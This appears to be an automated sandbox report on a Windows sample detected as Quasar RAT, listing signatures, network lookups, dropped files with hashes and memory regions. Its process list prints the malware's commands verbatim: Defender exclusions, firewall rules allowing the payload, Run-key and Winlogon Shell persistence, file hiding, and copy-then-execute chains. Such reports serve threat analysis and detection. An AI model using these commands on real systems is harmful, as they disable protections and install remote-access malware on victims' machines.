Analysis Overview
SHA256
231a7780f0f4272deb756c57250382671a1a8f723730a3ad5ceb7f7fd1e600cd
Threat Level: Known bad
The file 231a7780f0f4272deb756c57250382671a1a8f723730a3ad5ceb7f7fd1e600cd was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Modifies Windows Firewall
ACProtect 1.3x - 1.4x DLL software
Unexpected DNS network traffic destination
Loads dropped DLL
UPX packed file
Executes dropped EXE
Looks up external IP address via web service
Enumerates physical storage devices
Unsigned PE
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-01 07:53
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-01 07:53
Reported
2023-08-01 07:55
Platform
win10-20230703-en
Max time kernel
39s
Max time network
155s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\231a7780f0f4272deb756c57250382671a1a8f723730a3ad5ceb7f7fd1e600cd.exe
"C:\Users\Admin\AppData\Local\Temp\231a7780f0f4272deb756c57250382671a1a8f723730a3ad5ceb7f7fd1e600cd.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\nslookup.exe
nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic ComputerSystem get Domain
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Users\Admin\AppData\Local\Temp\7z.exe
7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic computersystem where name="CXVLSGIX" set AutomaticManagedPagefile=False
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Windows\SysWOW64\attrib.exe
"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
C:\Users\Admin\AppData\Local\Temp\ratt.exe
"ratt.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 7
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 13 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 13
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
C:\Users\Admin\Music\rot.exe
"C:\Users\Admin\Music\rot.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 222.222.67.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.148.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\ratt.bat
| MD5 | 7ea1fec84d76294d9256ae3dca7676b2 |
| SHA1 | 1e335451d1cbb6951bc77bf75430f4d983491342 |
| SHA256 | 9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940 |
| SHA512 | ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317 |
memory/4732-139-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4732-140-0x0000000000860000-0x0000000000896000-memory.dmp
memory/4732-141-0x0000000000D80000-0x0000000000D90000-memory.dmp
memory/4732-142-0x0000000000D80000-0x0000000000D90000-memory.dmp
memory/4732-143-0x0000000006FB0000-0x00000000075D8000-memory.dmp
memory/4732-144-0x0000000006AF0000-0x0000000006B12000-memory.dmp
memory/4732-145-0x0000000006C70000-0x0000000006CD6000-memory.dmp
memory/4732-146-0x0000000006DE0000-0x0000000006E46000-memory.dmp
memory/4732-147-0x00000000075E0000-0x0000000007930000-memory.dmp
memory/4732-148-0x0000000006F10000-0x0000000006F2C000-memory.dmp
memory/4732-149-0x0000000006F30000-0x0000000006F7B000-memory.dmp
memory/4732-150-0x0000000007C20000-0x0000000007C96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_00agyxkz.qks.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4732-162-0x0000000000D80000-0x0000000000D90000-memory.dmp
memory/4732-161-0x0000000000D80000-0x0000000000D90000-memory.dmp
memory/4732-166-0x0000000073B10000-0x00000000741FE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 0f5cbdca905beb13bebdcf43fb0716bd |
| SHA1 | 9e136131389fde83297267faf6c651d420671b3f |
| SHA256 | a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060 |
| SHA512 | a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0 |
memory/3368-169-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/3368-171-0x0000000000E50000-0x0000000000E60000-memory.dmp
memory/3368-172-0x0000000000E50000-0x0000000000E60000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8eb4b5fe8ece688db99d9a2054fdd4e4 |
| SHA1 | 04f747cf6d7e6b217bafc5d9d31d17acc17db338 |
| SHA256 | 705482878f52a44038f01f1c749d78a9dda820d4e777f51f24ec7b1b98847e1d |
| SHA512 | eac888713a1fd5af628ab1b32fc6bb923556e5e7aa60abfd81a5f9d65d4f483c19cb6637daa996eb1d25079fa13edf65a247e017d87bb1c63ff31f71c47f69d1 |
memory/3368-187-0x0000000000E50000-0x0000000000E60000-memory.dmp
memory/3368-184-0x0000000000E50000-0x0000000000E60000-memory.dmp
memory/164-190-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/164-192-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/164-191-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 29f4d502620669d407e900b85bf3a712 |
| SHA1 | cb349cf1b89d46e7469ba6d382330495a568de14 |
| SHA256 | 4ff3b122b0ff6f104b788e9b3306cbb7b75bdfc2d6d02de913851d9baac37964 |
| SHA512 | da68c95e14cbacde6cb9da13179d74213a609b8b007cfd73e31f70458d9b2f58ea751af6ad0e1ff477fe0ca62a358c28e0f1469e5136c2394c8412021bff6c36 |
memory/164-205-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/164-204-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/164-209-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/3368-208-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/3224-213-0x00000000050C0000-0x00000000050D0000-memory.dmp
memory/3224-214-0x00000000050C0000-0x00000000050D0000-memory.dmp
memory/3224-212-0x0000000073B10000-0x00000000741FE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 86333d64abc358a57f4f84e6c33987ad |
| SHA1 | 5c54cfbf251581a7b463bd376739706614252cf5 |
| SHA256 | a63850416bd62726b5e6fb1b2d13d9a231a2d4249b2021644fb663b3082abd7b |
| SHA512 | 707fc374ec1f1920ea0be4b1883b85c9a621985252d9040d6f6ed19fae9eca410ccc7de44dc098d53bfc2135d755d6d7ebb3270893496d50aa1e96a24a9f6065 |
memory/3224-226-0x00000000050C0000-0x00000000050D0000-memory.dmp
memory/3224-229-0x00000000050C0000-0x00000000050D0000-memory.dmp
memory/3224-230-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/2996-234-0x0000000007360000-0x0000000007370000-memory.dmp
memory/2996-235-0x0000000007360000-0x0000000007370000-memory.dmp
memory/2996-233-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/2996-236-0x00000000082D0000-0x0000000008620000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b6a1ec0d626f652a291ec62b3ea3dc08 |
| SHA1 | e896e7b7523c80d6fcd97274449fbf2b8ae23da2 |
| SHA256 | ed225ad4a6fdb507a3463513741ca325088f89f3f8fdfa394fe1679cbaeb56f3 |
| SHA512 | e2cbed9fb8b9598205e5b248c3721f548b22084f9a831553a089fd0a9257b65ee41dbc13e2605dbe2d48384402a7ebcdc1151f31f4900f62ec744c8c54105bd0 |
memory/2996-248-0x0000000007360000-0x0000000007370000-memory.dmp
memory/2996-249-0x0000000007360000-0x0000000007370000-memory.dmp
memory/2996-252-0x0000000073B10000-0x00000000741FE000-memory.dmp
memory/4348-255-0x0000000000400000-0x0000000000432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
C:\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
memory/4348-259-0x0000000010000000-0x00000000100E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.7z
| MD5 | 7de6fdf3629c73bf0c29a96fa23ae055 |
| SHA1 | dcb37f6d43977601c6460b17387a89b9e4c0609a |
| SHA256 | 069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff |
| SHA512 | d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8 |
memory/4348-263-0x0000000000400000-0x0000000000432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | de0b5ab575ece81f5783b326a5bd4d14 |
| SHA1 | 6c76b4fab946d26ac0bdf4442015e2767a5cb7d6 |
| SHA256 | bd0a33c8b5478b4c8b75738018f25d76cbe3e7e81747454c38d8681f47ba2ac5 |
| SHA512 | 147267776f00284d733fd03f6037459b7f9b955754681d2c0cdba3c4c4ec857fb11f024731c1a24961d4e487149c58b8292439aa3c78360d1907b0197d654e88 |
memory/3184-269-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/3184-270-0x0000000007B50000-0x0000000007EA0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 99994b78ff6554cc641133ddc99ea3b7 |
| SHA1 | 47ef8cdcf30438d0202f5b0d22fe6579e6c32ccb |
| SHA256 | 7424305f5007f7d45da44079d39a654f180f566946b8786598caa631fb8f9deb |
| SHA512 | ea4f45c238931cce030858f9d72e053ee0eaf3549ea5e6b0dbff037bdaced3df79562913f098c32846303890784fee9925c30df3db7f1eaca53ff36114a56f28 |
memory/3184-272-0x00000000081B0000-0x00000000081FB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Add.ps1
| MD5 | 0df43097e0f0acd04d9e17fb43d618b9 |
| SHA1 | 69b3ade12cb228393a93624e65f41604a17c83b6 |
| SHA256 | c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873 |
| SHA512 | 01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb |
memory/3184-294-0x0000000009620000-0x0000000009653000-memory.dmp
memory/3184-295-0x0000000009170000-0x000000000918E000-memory.dmp
memory/3184-300-0x0000000009660000-0x0000000009705000-memory.dmp
memory/3184-301-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/3184-302-0x0000000006DE0000-0x0000000006DF0000-memory.dmp
memory/3184-303-0x0000000009870000-0x0000000009904000-memory.dmp
memory/3184-496-0x0000000009790000-0x00000000097AA000-memory.dmp
memory/3184-501-0x0000000009770000-0x0000000009778000-memory.dmp
memory/3184-527-0x000000000A010000-0x000000000A688000-memory.dmp
memory/3184-528-0x00000000097F0000-0x000000000980A000-memory.dmp
memory/3184-533-0x0000000006DE0000-0x0000000006DF0000-memory.dmp
memory/3184-534-0x0000000009940000-0x0000000009962000-memory.dmp
memory/3184-535-0x000000000A690000-0x000000000AB8E000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
| MD5 | 69d3b004b17f53fcf6c7bdec1ba205b4 |
| SHA1 | 9ff86401704c40db5c2f420a836fda94fd58fb33 |
| SHA256 | c8143283ff7c01d2660550f1b9db1b2c0b739abda8d7e0ca52cc17ffdd4a67e1 |
| SHA512 | 90fa78e6a7ad37a1d02ccc74655c772997d91c1f315d58c9134b60c2baacb11c5c5bd2d7ac03e3135abf30575223a1ace30f7432fcc075675d999f27a2abe247 |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe
| MD5 | 0c8fb1b6e6ad1b3584dc37055ed61714 |
| SHA1 | d02394d2602126807a8c65796e78bc1f3fb5934d |
| SHA256 | 6a7d4a057b43728adfc4a1f48f0569fca03dc435af1d6358f9312371b78618a5 |
| SHA512 | 9ebf1ab639a78a363cf3bf5b22c6a016ec11acd6ec05954a5673aeec48e8e9ee45b0157677dbbb42baf70caaea59070785083644065e6e88909a85d1e0008642 |
memory/2980-564-0x00000000012E0000-0x0000000001496000-memory.dmp
memory/2980-566-0x0000000073A40000-0x000000007412E000-memory.dmp
memory/2980-568-0x0000000001230000-0x00000000012CC000-memory.dmp
memory/2980-579-0x0000000004BE0000-0x0000000004C72000-memory.dmp
memory/2980-582-0x0000000004E10000-0x0000000004E20000-memory.dmp
memory/2980-587-0x00000000010F0000-0x0000000001136000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | 52c44527220c480a60afa4868c7a1f3a |
| SHA1 | d7cf76fbcc72748ad1ecb7018859a1766b9e6853 |
| SHA256 | a36bda0ca72032e6d105cea26cb877ef3a1deb3275d5cb86cad249e544508711 |
| SHA512 | 30c801f73e2deb4910911fcf2fb2d0fd6d6bc8b8504499bb4c61603c7974ae722782be53d5eb9e36adc86881b245d2e6e1a8c98176de8bceca13e29ebddf2751 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log
| MD5 | 9e104e9aa0cfdec0753de24cbe3f587b |
| SHA1 | f63b8d0b29c65e518be6a9412e7499c9de11be78 |
| SHA256 | 59a9f13de0e003ea4adcd0193477f147b0c91ae847eebc744e91a4efe167223f |
| SHA512 | 8253854159ceac2d84eb371c9672730831505dea52ac3bc2cca45ee5308717ca3f11734602d0a409974b137084a8c20e6b7653640991e45708f692c65ac4933b |
C:\Users\Admin\Music\rot.exe
| MD5 | ef4cebe5c1b9c6a442ce9eb8a4eec768 |
| SHA1 | d68b82c4f397e0e9d4d6d1841b0eb1b7e121de04 |
| SHA256 | cbba13cc9e5b83f005ac76bb1d323bf203ec0127ae9f3a4f9236731542a88f17 |
| SHA512 | 05779e0f129f7bf29f1bdedffdc90428091c2ae4d45202a3ea05c2b6506bf2d9ca7f728d68900e84385eeeb6548872078972ddac2cdaae6fe59a14165489b577 |
C:\Users\Admin\Music\rot.exe
| MD5 | bdcba88782a4742768d5ab4d60547bab |
| SHA1 | 3f7c30a403c125e1273a2c6e192bedcb926f8381 |
| SHA256 | a3ea0b8c4f098acdbd91f000c5cc14da7ef3ce1fbe309e67ff075b77717a721b |
| SHA512 | c88166f2fb11e6658518f523654f1064f506e7e527f1d4696dfb94a927b199f96e37ad684c353a746fe76416733d9837fb48e362ce62f1d899c30fa51e3d05e0 |
C:\Users\Admin\Music\rot.exe
| MD5 | 473cc1b1447348238ba0fd113985428b |
| SHA1 | d6ff35f73959812faa85ec413fee34ad784d6498 |
| SHA256 | 77447c86996900f6c62381e05c84f3c80152cbad9d83fc2c26e2b44d3035c98e |
| SHA512 | b25de688f3dc1a86b9a2b68a289369e6c5b008ce4efdb7fad43d0822ce9fb8412a33839260fef2c61dabcaaffbe2dbf1eb50f4b37c6f9f8f90f3c41079fdd43d |
memory/2192-617-0x0000000000400000-0x000000000045E000-memory.dmp